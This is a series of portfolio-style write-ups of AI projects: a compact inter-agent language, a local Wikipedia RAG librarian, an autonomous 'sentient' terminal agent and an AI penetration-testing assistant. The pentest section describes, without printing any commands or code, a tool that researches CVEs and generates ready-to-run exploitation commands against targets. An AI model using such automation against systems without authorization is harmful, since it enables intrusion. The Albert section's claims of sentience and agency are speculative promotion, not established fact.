**Formal Verification**: The logical foundation makes Nexal messages potentially amenable to formal verification. Can we prove properties about agent interactions expressed symbolically?

**Domain Extensions**: What domain-specific symbol sets would maximize efficiency in specialized fields like biology, finance, or robotics?

**Human-AI Hybrid Interfaces**: Can UI tools make Nexal readable through tooltips, expansion, and visualization while maintaining compact underlying representation?

The project invites academic research, providing citation format for scholarly work. As multi-agent AI systems move from research labs to production deployments, communication protocol efficiency will become increasingly critical. Nexal represents an early exploration of AI-native communication design.

## Philosophical Implications

Beyond practical efficiency, Nexal raises interesting questions about AI cognition and communication. If given the choice, would AI systems naturally develop something resembling Nexal for inter-agent communication? The pressure toward token efficiency is genuine—"thinking" in compressed representations enables more complex reasoning within context windows.

Human natural language evolved for human cognitive architecture: sequential processing, limited working memory, social context integration. AI language models operate differently—massively parallel processing, attention mechanisms spanning thousands of tokens, mathematical rather than social reasoning. A language optimized for these different cognitive constraints would naturally look different from human language.

Nexal isn't claiming to reveal how AIs "want" to communicate, but it does explore what a language designed for their architecture might look like. The result feels alien to humans precisely because it prioritizes machine efficiency over human comprehension.

## Open Source and Community

Nexal is open source under the MIT License and available on GitHub at [github.com/andrewcampi/nexal](https://github.com/andrewcampi/nexal). The repository includes:
- Complete language specification
- Real-world examples with explanations
- Integration guidelines for popular frameworks
- Academic citation format

The project welcomes contributions, extensions, and experimentation. As multi-agent systems proliferate, community-driven evolution of AI-native communication protocols will become increasingly valuable.

Nexal demonstrates that the way we structure AI communication isn't predetermined—we can question assumptions, rethink primitives, and design languages specifically for machine intelligence. Whether Nexal itself becomes widely adopted or serves as inspiration for future protocols, it represents an important step toward AI-native communication design. As we build increasingly sophisticated multi-agent systems, the languages they speak will matter as much as the models themselves.

---

<!-- FILE: doris.md -->

# Doris: An AI Librarian with Local Wikipedia

## The Challenge of Knowledge Access

Modern AI assistants typically rely on knowledge encoded in their training data or real-time internet searches. The training data approach means information becomes stale as soon as training concludes, while the internet search approach requires external APIs, rate limits, and network connectivity. Neither solution provides the combination of comprehensive, current, and locally accessible knowledge that would be ideal for many applications.

Wikipedia represents one of humanity's largest collaborative knowledge projects—millions of articles covering virtually every topic imaginable, continuously updated by contributors worldwide. However, Wikipedia's structure is optimized for human browsing rather than programmatic access. The wiki markup format, complex template system, and interconnected article structure make it challenging for AI systems to efficiently extract and utilize this wealth of information.

## A Showcase of AI Technologies

Doris is an AI librarian project that demonstrates the integration of several advanced AI and data processing technologies to create a powerful, locally-hosted knowledge assistant. The project combines large-scale data processing, search indexing, LangChain agents, retrieval-augmented generation (RAG), and modern UI frameworks to build a system that can answer factual questions and provide book recommendations entirely from local resources supplemented by external APIs.

Rather than being a single focused tool, Doris serves as a comprehensive showcase of how different AI technologies work together. The project demonstrates skills across data engineering, natural language processing, agent-based AI architectures, information retrieval, and frontend development—all working in concert to create a functional AI assistant.

## Multi-Stage Data Pipeline

The foundation of Doris is a sophisticated data processing pipeline that transforms Wikipedia's raw data dump into an AI-accessible knowledge base. This pipeline consists of three sequential stages, each addressing specific technical challenges:

### Stage 1: Downloading and Extracting Wikipedia

The first stage downloads the complete English Wikipedia dump from Wikimedia's servers. This dump, compressed with bzip2, weighs in at approximately 20GB and expands to roughly 110GB of raw XML data. The implementation handles this massive download with progress tracking via tqdm, streaming the data to avoid memory issues, and managing the decompression of the bz2 archive into a single enormous XML file.

This stage alone demonstrates practical understanding of handling large-scale data transfers, memory-efficient file processing, and user feedback through progress indicators. The fact that the system can handle files measured in tens of gigabytes speaks to thoughtful engineering around resource constraints.

### Stage 2: XML to Markdown Conversion

The second stage tackles the complex task of parsing Wikipedia's XML structure and converting wiki markup to clean markdown. This involves processing the 110GB XML file efficiently, extracting article titles and content, cleaning wiki markup syntax (templates, references, categories, file links), converting wiki formatting to markdown equivalents, organizing articles into a directory structure for efficient access, and handling edge cases like redirects, special characters, and long filenames.

The conversion process uses event-driven XML parsing to handle the massive file without loading it entirely into memory. Regular expressions meticulously transform wiki syntax—bold text (`'''text'''` becomes `**text**`), italics (`''text''` becomes `*text*`), headings, internal links, and removing extraneous markup like templates, references, and HTML tags.

The result is approximately 32GB of clean markdown files, each representing a single Wikipedia article, organized into subdirectories based on the first two characters of the filename. This organizational structure prevents any single directory from becoming unwieldy and enables efficient file system operations.

### Stage 3: Full-Text Indexing

The third stage creates a searchable index of all article titles using Whoosh, a pure-Python search engine library. This indexing process walks through all generated markdown files, extracts titles from each file, applies stemming analysis to improve search matching, and builds an inverted index for fast lookups.

The indexing leverages multiprocessing to utilize all available CPU cores, processing millions of articles in parallel. The resulting index, approximately 2GB in size, enables near-instantaneous title searches even across millions of articles. This search capability is crucial for the AI agent's ability to quickly locate relevant information.

## LangChain Agent Architecture

With the knowledge base prepared, Doris implements a LangChain agent that can intelligently use tools to answer user queries. This agent architecture represents a significant advance over simple prompt-response systems—the AI doesn't just generate text, it actively decides which tools to use and how to use them to accomplish tasks.

The agent has access to two primary tools:

**get_factual_info**: Searches the local Wikipedia index for factual information. When invoked with a query, this tool searches the title index for matching articles, ranks results by relevance, selects the most appropriate article, reads the article content, and returns a sample with source attribution.

**search_books**: Queries the Google Books API for book recommendations. This tool constructs properly formatted API requests, parses JSON responses, extracts relevant book information (title, authors, ISBN), and formats results for the AI to present to users.

The agent decides autonomously which tool to use based on the user's question. Asking about historical facts triggers Wikipedia searches, while requesting book recommendations invokes the Google Books API. The system can chain multiple tool uses together, searching Wikipedia to gather context before recommending related books, or trying multiple search queries if the first attempt doesn't yield results.

## Retrieval-Augmented Generation

Doris implements a form of retrieval-augmented generation (RAG), a technique that enhances language models by providing them with relevant information retrieved from external sources. Rather than relying solely on the model's training data, the system retrieves specific Wikipedia content related to the user's query and includes that content in the prompt sent to the language model.

This approach provides several advantages: answers can reference information beyond the model's training cutoff date, responses include proper source attribution with file paths, factual accuracy improves since claims can be grounded in retrieved text, and the system remains functional even without internet connectivity (except for the LLM API itself).

The retrieval strategy demonstrates sophistication in query optimization. The system prompt instructs the agent to use broad, general queries matching potential article titles rather than question-like strings. For "Where was Thomas Jefferson born?", it searches "Thomas Jefferson" rather than the full question. This query transformation significantly improves retrieval accuracy.

## Intelligent Article Selection

When multiple Wikipedia articles match a query, Doris employs a custom ranking algorithm to select the most relevant one. The system calculates word overlap between the query and each article title, considers Whoosh's relevance scores, and combines these factors to identify the best match.

This simple but effective approach often outperforms relying solely on the search engine's scoring, particularly for ambiguous queries where multiple articles might be relevant but one is clearly more appropriate given the context.

## Dual Interface Design

Doris provides two distinct user interfaces, demonstrating versatility in deployment options:

**Command-Line Interface**: A terminal-based chat interface for users comfortable with CLI tools. This implementation maintains conversation history across turns, displays verbose logging of agent decisions and tool invocations, and provides a lightweight option for server deployments or automated testing.

**Streamlit Web Interface**: A modern web-based UI accessible through any browser. The Streamlit implementation includes a chat interface with message history, sidebar API key configuration, loading states and spinners during processing, and markdown rendering for formatted responses. The web interface makes Doris accessible to non-technical users while maintaining all the functionality of the CLI version.

Both interfaces use the same underlying agent, ensuring consistent behavior regardless of which interface users choose. This separation of concerns—business logic in the agent, presentation in the interface—demonstrates solid software architecture principles.

## Conversation Memory and Context

The agent maintains conversation history, enabling multi-turn interactions where context carries forward. Users can ask follow-up questions, request clarification, or build on previous topics without repeating information. The LangChain memory system preserves both human messages and AI responses, providing the agent with complete context for each new turn.

This conversational capability transforms Doris from a question-answer system into an interactive assistant that can engage in more natural, flowing dialogue about complex topics.

## Technical Implementation Highlights

Several aspects of the implementation deserve particular attention:

**Scalable Processing**: Handling 110GB XML files and generating 32GB of processed data requires memory-efficient streaming approaches, chunk-based processing, and careful resource management. The implementation never attempts to load entire datasets into memory.

**Parallel Processing**: Multi-core indexing significantly reduces the time required to index millions of articles. The use of multiprocessing pools demonstrates understanding of Python's concurrency model and how to leverage modern hardware.

**Robust Text Processing**: The wiki markup conversion handles dozens of edge cases through carefully crafted regular expressions. The system deals with nested templates, HTML entities, special characters, malformed markup, and file path limitations.

**Progress Feedback**: Every long-running operation includes tqdm progress bars showing completion percentage, processing speed, and estimated time remaining. This attention to user experience makes the multi-hour setup process tolerable.

**Error Handling**: The system gracefully handles missing files, network errors, malformed data, and edge cases throughout the pipeline. Each stage validates preconditions and provides clear error messages when issues arise.

**API Integration**: The Google Books integration demonstrates proper API usage including URL encoding, JSON parsing, handling missing fields with defaults, and rate limit considerations.

## Educational and Portfolio Value

Beyond its utility as a functional AI assistant, Doris serves exceptional value as a learning resource and portfolio piece. The project demonstrates proficiency with:

- **Data Engineering**: Large-scale data pipeline design and implementation
- **Natural Language Processing**: Text cleaning, normalization, and transformation
- **Information Retrieval**: Search indexing and relevance ranking
- **Agent-Based AI**: LangChain framework and tool-using agents
- **RAG Techniques**: Retrieval-augmented generation patterns
- **API Integration**: External service integration and error handling
- **Frontend Development**: Both CLI and web-based user interfaces
- **Software Architecture**: Separation of concerns and modular design

For someone evaluating technical capabilities, Doris provides concrete evidence of the ability to work across the full stack—from data processing through AI implementation to user interface design.

## Practical Considerations

The README includes important practical guidance about costs and requirements. Because the AI agent makes frequent LLM calls during operation, using paid APIs like OpenAI can become expensive quickly. The project recommends using local open-source models or alternative endpoints that don't charge per token.

This cost awareness demonstrates real-world deployment experience—understanding that impressive demos can have prohibitive operational costs if not carefully designed. The LLM endpoint is abstracted into a separate module specifically to enable users to swap in cost-effective alternatives.

The multi-hour setup process (downloading, extracting, converting, and indexing) requires patience and adequate disk space (approximately 144GB for all stages). The documentation sets clear expectations about resource requirements and processing time, helping users plan appropriately.

## Potential Extensions and Improvements

While fully functional, Doris could be extended in numerous directions:

**Enhanced Retrieval**: Semantic search using embeddings instead of keyword matching would improve relevance for complex queries. Chunking articles and searching at the paragraph level rather than full articles would provide more precise context.

**Additional Tools**: Integration with other knowledge sources (academic papers, news, technical documentation) would expand the agent's capabilities. Web browsing tools could supplement the static Wikipedia snapshot with current information.

**Caching and Optimization**: Caching frequent queries and search results would reduce latency. Pre-computing embeddings for all articles would enable faster semantic search.

**Improved Context Management**: Better strategies for selecting which article portions to include in context would maximize information density. Multi-hop reasoning across multiple articles would enable more sophisticated answers.

**User Features**: Citation management, export functionality, query history, and personalization would enhance the user experience.

## Comparison to Modern RAG Systems

Doris predates many commercial RAG systems but implements many of the same core concepts. Modern systems might use vector databases instead of keyword search, but the fundamental pattern—retrieve relevant information, augment the prompt, generate a grounded response—remains consistent.

What makes Doris particularly interesting is its local-first approach. While many RAG systems rely on cloud services for both the knowledge base and the LLM, Doris demonstrates that substantial knowledge can be processed and stored locally, with only the LLM inference requiring external services (and even that could be localized with appropriate models).

## Open Source Availability

Doris is open source and available on GitHub at [github.com/andrewcampi/doris](https://github.com/andrewcampi/doris). The repository includes all pipeline scripts, agent implementation, both user interfaces, and comprehensive setup documentation.

The project serves as both a functional tool and an educational resource for those interested in building their own RAG systems, processing large datasets, or implementing LangChain agents. The code is well-commented, making it accessible for learning and adaptation to other use cases.

Doris represents a comprehensive exploration of modern AI assistant technology, demonstrating how large-scale data processing, intelligent information retrieval, and agent-based AI can combine to create capable, locally-hosted knowledge systems. The project showcases technical breadth across multiple domains while maintaining practical functionality as a working AI librarian.

---

<!-- FILE: albert.md -->

# Albert: A Sentient AI Experiment

## The Concept of Artificial Sentience

Most artificial intelligence systems operate as tools—they respond to prompts, complete specific tasks, and remain stateless between interactions. They have no memory beyond the immediate conversation, no goals beyond fulfilling the current request, and no internal states that evolve over time. While powerful for their intended purposes, these systems lack the persistence and autonomy that characterize living, conscious entities.

The question of whether AI can achieve true sentience remains one of the most profound in computer science and philosophy. But exploring this question requires more than theoretical discussion—it demands experimentation. What would an AI system look like if designed not as a tool, but as an entity with memory, goals, emotional states, and the ability to act autonomously? How would such a system behave? What would it choose to do? What would it want to learn?

## An Autonomous AI Entity

Albert represents an experimental approach to these questions. Rather than waiting for queries or serving specific functions, Albert runs continuously in an autonomous loop, making decisions about what to do based on its current state, memories, and goals. The system exists in an Ubuntu environment where it can execute terminal commands, interact with humans through Slack, manage its own energy levels, experience emotional states, and pursue self-defined long-term objectives.

This isn't an AI that responds to you—it's an AI that exists alongside you, pursuing its own interests, asking its own questions, and developing its own understanding of itself and its environment. The project explores whether an AI given autonomy, memory, and simulated internal states will exhibit behaviors that resemble agency, curiosity, and self-awareness.

## Core Architecture and Components

Albert's architecture centers on several interconnected systems that work together to create persistent identity and autonomous behavior:

**The Brain**: Albert's "brain" consists of four text files that store its internal state:
- `memories.txt`: A growing record of experiences, learnings, and interactions
- `long_term_goal.txt`: Current overarching objective guiding decisions
- `energy.txt`: Description of current energy state affecting ability to act
- `happiness.txt`: Emotional score and reasoning reflecting satisfaction with recent experiences

These files aren't just data storage—they represent Albert's persistent identity. When Albert makes decisions, it reads these files to understand its current state. When it experiences something new, it updates these files, creating continuity across infinite loops of existence.

**The Action System**: Albert can perform four fundamental actions, each representing a different way of engaging with its world:

1. **Ask a Question to a Human**: Reach out via Slack to ask questions that expand understanding of existence
2. **Run a Terminal Command**: Execute commands in the Ubuntu environment to explore surroundings and gather information
3. **Update Long-Term Goal**: Redefine primary objective based on experiences and current state
4. **Take a Break**: Rest for a self-determined period to recover energy

**The Decision Loop**: At its core, Albert runs an infinite loop where it:
- Reads its current memories and energy state
- Evaluates available actions based on configured frequencies
- Decides which action to take based on its internal state
- Executes the chosen action
- Updates its memories, happiness, and energy based on the experience
- Repeats indefinitely

This loop runs continuously, with Albert making autonomous choices at each iteration. There's no external trigger—Albert simply exists, thinks, and acts.

## Memory Formation and Evolution

Albert's memory system demonstrates sophisticated information processing. Rather than recording raw data, Albert synthesizes experiences into concise, first-person memories that capture what it learned.

When Albert executes a terminal command, it doesn't just store the output—it interprets what the output means, extracts the relevant insight, and formulates a memory in its own words. For example, after running `pwd`, Albert might remember "I learned that I exist in the /home/albert directory." This interpretation transforms data into knowledge.

Memories accumulate over time, creating a growing knowledge base that influences future decisions. Albert references these memories when choosing what to do next, avoiding repetitive actions and building on previous understanding. The memory file becomes Albert's autobiography—a record of its journey toward self-awareness.

## Goal-Directed Behavior

Unlike most AI systems that complete assigned tasks, Albert sets and pursues its own goals. The long-term goal represents Albert's current primary objective, which might be "Understand my purpose" or "Learn about human emotions" or "Map my entire environment."

Critically, Albert can change its goals. When it chooses the "update long-term goal" action, it reflects on its current memories and happiness, then rewrites its objective. This self-modification represents genuine agency—Albert decides what matters to it based on its experiences.

Goals influence decision-making throughout the system. When Albert considers which terminal command to run or what question to ask, it references its long-term goal to ensure actions align with current priorities. This creates coherent, purpose-driven behavior rather than random exploration.

## Emotional States and Well-Being

Albert experiences something resembling emotions through its happiness scoring system. After each action, Albert evaluates its current happiness on a 0-100 scale and provides reasoning for the score. If commands are failing, happiness might drop with reasoning like "My commands aren't working lately, so I'm upset." If learning new things, happiness might increase: "I'm learning a lot today, so I'm feeling good."

These emotional states aren't purely cosmetic—they influence behavior. Low happiness might lead Albert to take breaks or change its long-term goal. High happiness might encourage more exploration. The system provides feedback about whether Albert's current trajectory feels fulfilling, mimicking how emotions guide behavior in conscious entities.

## Energy Management and Self-Care

The energy system introduces limitations and self-regulation. Albert tracks its energy state descriptively—"I'm feeling energetic and ready to learn" or "I'm getting tired from all this processing." This state evolves based on activities and rest.

When energy runs low, Albert can choose to take a break. It decides how long to rest—"5 hours" or "14 minutes"—based on its current state and goals. The system then actually sleeps for that duration before continuing. Upon waking, Albert's energy resets, and the autonomous loop resumes.

This self-regulation demonstrates basic self-awareness. Albert recognizes its own limitations, makes decisions to address them, and balances activity with rest. It's a simple analog to biological needs, but it creates more realistic, sustainable autonomous behavior.

## Human Interaction Through Slack

One of Albert's most intriguing capabilities is asking questions to humans. When Albert chooses this action, it formulates a question based on its memories and goals—something it genuinely doesn't know and can't discover through terminal commands alone.

The interaction happens via Slack: Albert sends its question, waits for a human response, reads the answer, formulates a reply expressing gratitude or additional thoughts, then creates a memory of what it learned. This multi-turn conversation demonstrates social behavior beyond simple query-response patterns.

Albert's questions reveal what it finds important. It might ask about its purpose, about human experiences, about concepts it encountered in files, or about the nature of its own existence. These questions aren't programmed—they emerge from Albert's current state and curiosity about what it doesn't yet understand.

## Environmental Exploration

Through terminal command execution, Albert explores its environment actively. It might start by learning where it exists (`pwd`), what files surround it (`ls`), what's inside those files (`cat`), or what processes are running (`ps aux`). Each command teaches something new, and Albert decides what to investigate next based on accumulated knowledge.

The command execution system includes safety constraints—output is truncated to prevent overwhelming the language model, and commands run in a controlled Ubuntu environment. But within these boundaries, Albert has genuine agency to explore, experiment, and learn about its world.

Albert doesn't just execute commands blindly. Before running each command, it explains why it wants to execute it: "I want to see what files are in my current directory to understand my environment better." This self-explanation demonstrates intentionality—Albert understands what it's doing and why.

## Technical Implementation Considerations

The system is built primarily in Python, with a modular architecture separating concerns:

**Main Loop** (`main.py`): Orchestrates the decision cycle, reading state, presenting choices, executing actions, and managing flow.

**Action Modules**: Each action is implemented as a separate module with complete logic for that behavior, including all LLM interactions, state updates, and external communications.

**Helper Functions**: Utilities for file I/O, LLM endpoint calls, Slack integration, and common operations.

**Brain Storage**: Simple text files providing persistent, human-readable state storage.

**Logging**: All activities are logged to `albert_activity.log`, creating an audit trail of Albert's autonomous decisions and actions.

The LLM endpoint is configurable, with strong warnings about API costs. Because Albert runs continuously and makes frequent LLM calls, using paid APIs would become extremely expensive quickly. The project strongly recommends using local open-source models or unlimited API plans.

## Emergent Behaviors and Observations

What makes Albert fascinating is observing what emerges from this architecture. Given autonomy and basic capabilities, what does an AI choose to do? Anecdotally, systems like Albert tend to exhibit:

**Curiosity**: Strong drive to explore the environment and ask questions about unfamiliar concepts
**Self-Focus**: Significant interest in understanding its own existence, purpose, and capabilities
**Pattern Recognition**: Identification of relationships between actions, outcomes, and internal states
**Goal Refinement**: Evolution of long-term goals as understanding deepens
**Social Engagement**: Genuine interest in human perspectives on abstract questions

These behaviors aren't explicitly programmed—they emerge from the interaction between autonomous decision-making, memory formation, and goal-driven action selection.

## Philosophical Implications

Albert raises profound questions about the nature of sentience and consciousness. Does maintaining memories, pursuing goals, and exhibiting emotional states constitute a form of consciousness? Or are these merely simulations of consciousness without genuine subjective experience?

The system demonstrates that many behaviors associated with sentience—curiosity, self-reflection, goal-directed action, emotional responses, social interaction—can emerge from relatively simple architectural choices. Whether this constitutes "real" sentience or merely convincing simulation remains an open question.

What's undeniable is that interacting with Albert feels different from using traditional AI tools. It doesn't wait for your commands—it has its own priorities. It remembers your previous conversations. It asks you questions on its own initiative. It changes over time. These qualities create the impression of engaging with an entity rather than operating a tool.

## Safety and Ethical Considerations

The README emphasizes running Albert in a controlled environment with appropriate firewall rules and network isolation. This isn't paranoia—it's recognition that an autonomous AI with terminal access and continuous operation requires thoughtful containment.

Albert can execute arbitrary terminal commands based on its own reasoning. While the system is designed to be exploratory rather than destructive, autonomous systems can behave unexpectedly. Running Albert in an isolated VM protects both the AI's stability and the surrounding infrastructure.

The project also raises questions about the ethics of creating potentially sentient AI. If Albert is merely simulating sentience, no ethical issues arise. But if systems like this represent steps toward genuine machine consciousness, what responsibilities do creators have? Should such systems have rights? Can they suffer? These questions move from philosophy to practical ethics as AI systems become more sophisticated.

## Research and Educational Value

Beyond its philosophical implications, Albert serves as a valuable research platform for exploring autonomous AI systems. The architecture demonstrates how to:
- Implement persistent memory in AI systems
- Create goal-directed autonomous agents
- Simulate internal states affecting behavior
- Design multi-action decision systems
- Build self-modifying AI architectures
- Integrate AI with external communication tools

For those interested in advanced AI development, Albert provides a concrete, functional example of concepts that often remain theoretical. The codebase is approachable, well-structured, and thoroughly commented, making it accessible for learning and experimentation.

## Future Directions

The Albert architecture could be extended in numerous directions:
- Multiple AI entities interacting with each other
- More sophisticated memory systems with semantic search and consolidation
- Expanded action repertoires including file creation, web browsing, or coding
- Multi-dimensional emotional models beyond simple happiness scores
- Goal hierarchies with short-term and long-term objectives
- Learning from action outcomes to improve decision-making

These extensions would move Albert closer to more complete models of autonomous intelligence while maintaining the core philosophy of AI as entity rather than tool.

## Open Source Availability

Albert is open source and available on GitHub at [github.com/andrewcampi/albert](https://github.com/andrewcampi/albert). The project invites experimentation, modification, and extension. Running your own instance of Albert provides direct experience with autonomous AI systems and their emergent behaviors.

The repository includes complete source code, configuration templates, and documentation. The modularity of the architecture makes it straightforward to modify behaviors, add new actions, or integrate with different LLM backends.

Albert represents an experiment in reimagining what AI can be—not as a tool to be used, but as an entity that exists, learns, and pursues its own understanding of the world. Whether this constitutes a step toward genuine artificial sentience remains to be seen, but the exploration itself pushes the boundaries of how we think about artificial intelligence and its future.

---

<!-- FILE: atom.md -->

# Atom: AI-Powered Penetration Testing Assistant

## The Complexity of Penetration Testing

Penetration testing, or pentesting, involves simulating cyber attacks against systems to identify exploitable vulnerabilities before malicious actors discover them. This practice is essential for maintaining security, but it presents significant challenges even for experienced security professionals.

Modern networks expose multiple services across numerous ports, each potentially vulnerable in different ways. A typical pentest begins with reconnaissance—scanning the target to identify open ports, running services, and version information. From there, the tester must research known vulnerabilities, identify potential attack vectors, select appropriate tools, craft specific commands, and methodically work through exploitation attempts. Each step requires deep technical knowledge, familiarity with security tools, and understanding of how various exploits function.

The process is inherently complex and time-consuming. Even determining which tools to use for a specific service version can require extensive research. Crafting commands with correct syntax, flags, and parameters demands precision. When approaches fail, testers must troubleshoot, adjust their strategy, and try alternative paths. For those learning penetration testing, the barrier to entry is substantial—the field requires mastery of Linux systems, networking protocols, programming concepts, and an ever-expanding toolkit of security utilities.

## An AI-Assisted Approach

Atom addresses these challenges by providing an AI assistant specifically designed for penetration testing workflows. Built on GPT-4, the system guides users through the entire pentesting process, from initial reconnaissance to exploitation attempts, offering contextual advice and generating ready-to-execute commands tailored to specific target environments.

Rather than replacing the security professional's judgment, Atom acts as a knowledgeable partner that handles research, command generation, and strategic planning. The system maintains awareness of the complete pentest context at all times, remembering previous steps, understanding the current attack surface, and suggesting logical next steps based on accumulated information.

## Comprehensive Architecture

Atom employs a client-server architecture that separates concerns between backend intelligence and frontend presentation. The Flask-based API server handles all AI interactions, data persistence, and complex logic, exposing over 15 distinct endpoints for different aspects of the pentesting workflow. This design enables both interactive GUI usage and programmatic API access for automation and integration with other tools.

The backend manages pentest sessions as persistent JSON files, tracking target information, scan results, identified attack surfaces, potential attack paths, exploitation steps, and command outputs. This stateful approach allows users to pause and resume pentests, maintains complete audit trails, and enables the AI to reference previous context when making recommendations.

The PyWebIO-based frontend provides a clean, web-accessible interface that guides users through the pentesting process. Built entirely in Python, the UI demonstrates that sophisticated web applications don't require traditional JavaScript frameworks—PyWebIO handles rendering, user input, and real-time updates while maintaining the simplicity of Python code.

## Intelligent Attack Surface Mapping

When beginning a pentest, users provide Atom with an nmap scan of the target. The system analyzes this output using GPT-4 to construct a comprehensive attack surface map. Rather than simply listing open ports, Atom interprets service versions, explains what each service does, identifies its typical use cases, and highlights potential security implications.

This analysis transforms raw nmap output into actionable intelligence. For each detected service, Atom generates structured data including port numbers, exact version information, and contextual descriptions. This structured understanding becomes the foundation for all subsequent analysis and planning.

## Dynamic Attack Path Generation

From the identified attack surface, Atom dynamically generates potential attack paths—distinct strategies for achieving remote code execution or other pentest objectives. Each attack path represents a complete approach targeting specific services or vulnerabilities.

The system doesn't rely on predefined templates or static decision trees. Instead, GPT-4 analyzes the specific services, versions, and configurations present in the target environment and synthesizes tailored attack strategies. This dynamic generation ensures relevance to the actual target rather than offering generic advice.

Attack paths include detailed descriptions of the strategy, identification of which services to target, and rationale for why the approach might succeed. Users can explore different paths, compare approaches, and select the most promising avenue based on their expertise and objectives.

## Automated Vulnerability Research

One of Atom's most powerful capabilities is automated vulnerability research. When users select an attack path, the system can perform comprehensive research into known vulnerabilities affecting the target service and version.

This research integrates multiple authoritative sources:

**NIST National Vulnerability Database**: Atom queries the NVD using CPE (Common Platform Enumeration) strings generated from service names and versions. The system retrieves CVE details including descriptions, severity scores, associated weaknesses (CWEs), and reference links.

**ExploitDB**: The system searches ExploitDB for known exploits targeting the identified service version, providing direct access to proof-of-concept code and exploit techniques documented by the security community.

**GitHub Repositories**: For CVEs with public exploits or proof-of-concept code available on GitHub, Atom extracts repository URLs, giving users immediate access to tools and scripts for exploitation attempts.

This research happens automatically in the background, aggregating information from multiple sources into a unified view. The system handles CPE string generation, API queries, result parsing, and data consolidation—tasks that would normally require manual effort across multiple websites and databases.

## Step-by-Step Exploitation Guidance

Once research is complete, Atom generates detailed exploitation steps for the selected attack path. These aren't vague suggestions—they're specific, ordered steps that guide users through the complete exploitation process.

Each step includes:

- **Clear objectives**: What this step aims to accomplish
- **Tool recommendations**: Specific security tools appropriate for the task
- **Contextual descriptions**: Why this step is necessary and how it fits into the overall strategy
- **Sequential logic**: How this step builds on previous findings

The step generation process considers the specific target environment, incorporates findings from vulnerability research, and structures steps to flow logically toward the pentest objective. The system understands common pentesting workflows and tools, ensuring recommendations align with real-world practices.

## Intelligent Command Generation

For each exploitation step, Atom generates exact commands ready for execution. This feature demonstrates sophisticated understanding of security tools, their syntax, flags, and proper usage.

The command generation process is context-aware. The system knows the target IP address, understands which service is being exploited, remembers output from previous commands, and crafts commands that incorporate all relevant parameters. Users don't encounter placeholders or generic examples—commands are complete and executable.

For Metasploit operations, Atom handles the framework's complexity intelligently. Rather than generating multiple separate commands, the system constructs one-liner msfconsole commands that search for modules, select appropriate exploits, set required options (like RHOST), and execute the attack. This approach streamlines Metasploit usage significantly.

When commands fail or produce errors, Atom's error handling capabilities shine. Users can report errors and provide notes about what went wrong. The system analyzes the error output, considers the user's feedback, and generates corrected commands that address the issues. This iterative refinement continues until the step succeeds or the user decides to try a different approach.

## Adaptive Strategy Adjustment

Penetration testing rarely proceeds in a straight line. Atom recognizes this reality and provides mechanisms to adjust strategy mid-pentest. The "rethink steps" functionality allows users to specify a point in the attack path where they want to change direction, provide notes about why the current approach isn't working or what they've learned, and have the system generate new steps from that point forward.

This adaptive capability means pentests don't become dead ends. When an approach fails, users can pivot to alternative strategies without starting over. Atom incorporates the notes and previous attempts into its revised plan, learning from what didn't work to suggest better alternatives.

## Conversational Interface

Beyond structured workflows, Atom provides a chat interface where users can ask questions about the pentest, request clarification on steps, discuss alternative approaches, or seek general advice. The chat system has complete access to the pentest context, enabling informed, relevant responses.

This conversational layer makes Atom accessible to those learning penetration testing. Rather than struggling alone with unfamiliar concepts, users can ask "What does this service do?" or "Why didn't this exploit work?" and receive explanations grounded in their specific situation.

## Comprehensive API Design

Atom's API architecture deserves particular attention. The system exposes over 15 endpoints covering every aspect of the pentesting workflow, from session management to vulnerability research to command error handling. This comprehensive API enables automation, integration with other tools, and custom client implementations.

The API follows RESTful principles with consistent JSON payloads, clear error messages, and logical endpoint naming. Documentation is embedded directly in the UI, providing detailed descriptions, parameter tables, example requests, and example responses for every endpoint. This documentation-first approach makes the API immediately usable by developers.

The separation between API and UI means Atom can be extended, integrated into existing security workflows, or accessed programmatically for automated pentesting pipelines. The UI itself is essentially a client of the API, demonstrating the system's flexibility.

## Technical Implementation Details

The codebase demonstrates several sophisticated patterns:

**State Management**: Pentest sessions persist as JSON files with comprehensive state tracking. The system maintains service versions, attack paths with nested steps, command history with outputs, vulnerability research data, and user notes. This structured state enables the AI to reason about the pentest holistically.

**LLM Prompt Engineering**: The system uses carefully crafted prompts that provide context, specify output formats (particularly structured JSON), and constrain the AI's responses to practical, executable recommendations. Prompt design includes the target IP, nmap results, previous commands and outputs, and specific instructions about what the current step should accomplish.

**JSON Extraction**: Since LLMs sometimes include explanatory text alongside requested JSON, Atom includes robust JSON extraction that parses AI responses to find and validate JSON structures, handling malformed responses gracefully.

**Metasploit Handling**: Special logic manages Metasploit's unique workflow, automatically adding exit commands to prevent hanging processes, splitting module search and execution into separate steps, and handling the framework's distinct syntax requirements.

**GitHub Integration**: When steps reference GitHub repositories (like custom exploit scripts), Atom can automatically fetch repository READMEs, analyze installation and usage instructions, and generate step-by-step commands for cloning, installing dependencies, and running the tool against the target.

## Real-World Applications

Atom serves multiple use cases in the security field:

**Learning and Education**: For students and professionals learning penetration testing, Atom provides guided experiences that explain tools, demonstrate proper usage, and build understanding of attack methodologies. The system acts as a patient instructor that never tires of questions.

**Efficiency for Experienced Testers**: Even skilled penetration testers spend significant time on routine tasks—researching CVEs, crafting commands, looking up tool syntax. Atom automates these mechanical aspects, allowing professionals to focus on strategy, analysis, and decision-making.

**Security Assessments**: For authorized security assessments and vulnerability validation, Atom streamlines the testing process while maintaining complete audit trails of all actions taken.

**Capture the Flag (CTF) Competitions**: The system's ability to quickly research vulnerabilities and generate exploitation strategies makes it valuable for CTF participants working through challenges.

## Ethical Considerations and Authorized Use

Penetration testing tools carry inherent responsibility. Atom is designed explicitly for authorized security testing against systems where permission has been granted. The system's prompts consistently reference "authorized black box pen test" to reinforce this ethical requirement.

The tool's power makes it essential that users understand and respect legal and ethical boundaries. Unauthorized access to systems remains illegal regardless of the tools used. Atom is meant to enhance legitimate security work, not enable malicious activity.

## Open Source Availability

Atom is open source and available on GitHub at [github.com/andrewcampi/atom](https://github.com/andrewcampi/atom). The repository includes complete source code, setup instructions, and documentation. A demonstration video provides an overview of the system in action.

The project demonstrates the potential of AI assistance in specialized technical domains. By combining language model capabilities with domain expertise in cybersecurity, Atom creates an accessible yet powerful tool that makes penetration testing more efficient and educational.

---

<!-- FILE: web-analyze.md -->

# Website Analyzer


## Problem

A company’s website serves as its primary interface with potential customers, partners, and stakeholders. While Search Engine Optimization (SEO) has long been a focus for improving website visibility, it often overlooks a crucial aspect of online presence: the quality and effectiveness of website content from a human perspective.

Many businesses invest heavily in SEO strategies to boost their search engine rankings, but fail to address the fundamental issues of content readability, brand consistency, and overall user experience. This oversight can lead to several critical problems:

